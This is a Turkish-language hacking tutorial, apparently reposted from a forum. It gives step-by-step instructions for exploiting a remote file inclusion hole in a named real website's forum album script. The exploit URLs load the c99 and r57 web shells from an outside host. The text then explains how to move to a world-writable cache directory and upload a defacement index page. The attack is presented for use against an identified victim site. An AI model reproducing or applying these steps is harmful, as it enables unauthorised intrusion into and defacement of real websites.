domainhack-webhack-emailhack-ftp hack
by_kaos
  r57 kullanmak..hertürk anlar.
 
http://k-orda.kz/forum/album_mod/album_nuffimage_box.php?action=logout&album_root_path=http%3A%2F%2Fwww.siberordu.com%2Fc99.txt%3F&

Bu şu demektir:
http://k-orda.kz  diye bir site var (kurban site)
Bu sitenin Forum Klasörünün icinde bir klasör daha var album_mod adında..
yani: http://k-orda.kz/forum/album_mod    (adres bu oldu)

http://k-orda.kz/forum/album_mod  adresin album_mod klasörünün icinde album_nuffimage_box.php adında bir  php dosyası var . (sayfa)
http://k-orda.kz/forum/album_mod/album_nuffimage_box.php

bu sayfanın icinde kodlar var,ki bu kodlar o sayfayı oluşturur.
ve hatalı kodlamadan dolayı bir acık meydana gelmiş. Bu sayfanın icindeki kodlama hatasıda su :
action=logout&album_root_path

Bizde bu acıktan faydalanarak sitenin icine shell sokuyoruz.
acık tam şu şekil :
http://k-orda.kz/forum/album_mod/album_nuffimage_box.php?action=logout&album_root_path=
anlamı: bu sitenin forum klasöründeki  album_mod klasörünün icindeki  album_nuffimage_box.php nin icindeki action=logout&album_root_path  bu hata yapılmış kodları  http://www.siberordu.com/c99.txt?  adresine çağır...
Bu hatalı kodlamadan kaynaklanan bu RFI acığını shell imize cağırıyoruz.

Adres şöyle oluyor :
http://k-orda.kz/forum/album_mod/album_nuffimage_box.php?action=logout&album_root_path=http://www.siberordu.com/c99.txt?

Böylelikle hedef sitenin icine sızmış oluyoruz.Geriye kalan şey ise soktuğumuz shell i kullanabilme yeteneğidir. Onuda halledersiniz artık. Bu shell ile siteyi deface etmek mümkün oluyor.

buda R57 Dediğimiz Bir Shell scriptinin siteye injeksiyonlanması :
http://k-orda.kz/forum/album_mod/album_nuffimage_box.php?action=logout&album_root_path=http://www.siberordu.com/r57.txt?
/forum/album_mod  Work directory(Bulunan dizin)  nin karsısında  sil bunu
Şöyle kalsın : /home/kordak/public_html/   ve Change(Degistir) ye tıkla
Acılacak sayfa sitenin ana dizinidir.

Ve anadizinde :
2922225 drwxrwxrwx   2    kordak    nobody     512 24.11.2007 01:29 cache   (Yazan yer var)
drwxrwxrwx  (klasörün önündeki bu işaret, klasörün yazma izni olduğunu gösterir)
Shell deki : /home/kordak/public_html   yazan yer varya oraya şunu ekle  /cache
/home/kordak/public_html/cache  olacak ... sonra  Change(Degistir)  ye tıkla . o klasöre girecek.
Klasör zaten yazma izni olduğu icin .  acılan sayfada alta doğru in Gözat var oradan index.html (hack indexi) ni bilgisayarından seç ve siteye upload et  .. bitti.  Biz şimdi hangi sayfayı hacklamış olduk ?
http://k-orda.kz/cache    buraya gir ve indexine bak 

Kolaylar gelsin.


alıntıdır:alıntı by komutan...: http://www.siberordu.com/Smf/index.php?topic=3170.0
 
  
  Bugün 7 ziyaretçi (9 klik) kişi burdaydı!  
 
Bu web sitesi ücretsiz olarak Bedava-Sitem.com ile oluşturulmuştur. Siz de kendi web sitenizi kurmak ister misiniz?
Ücretsiz kaydol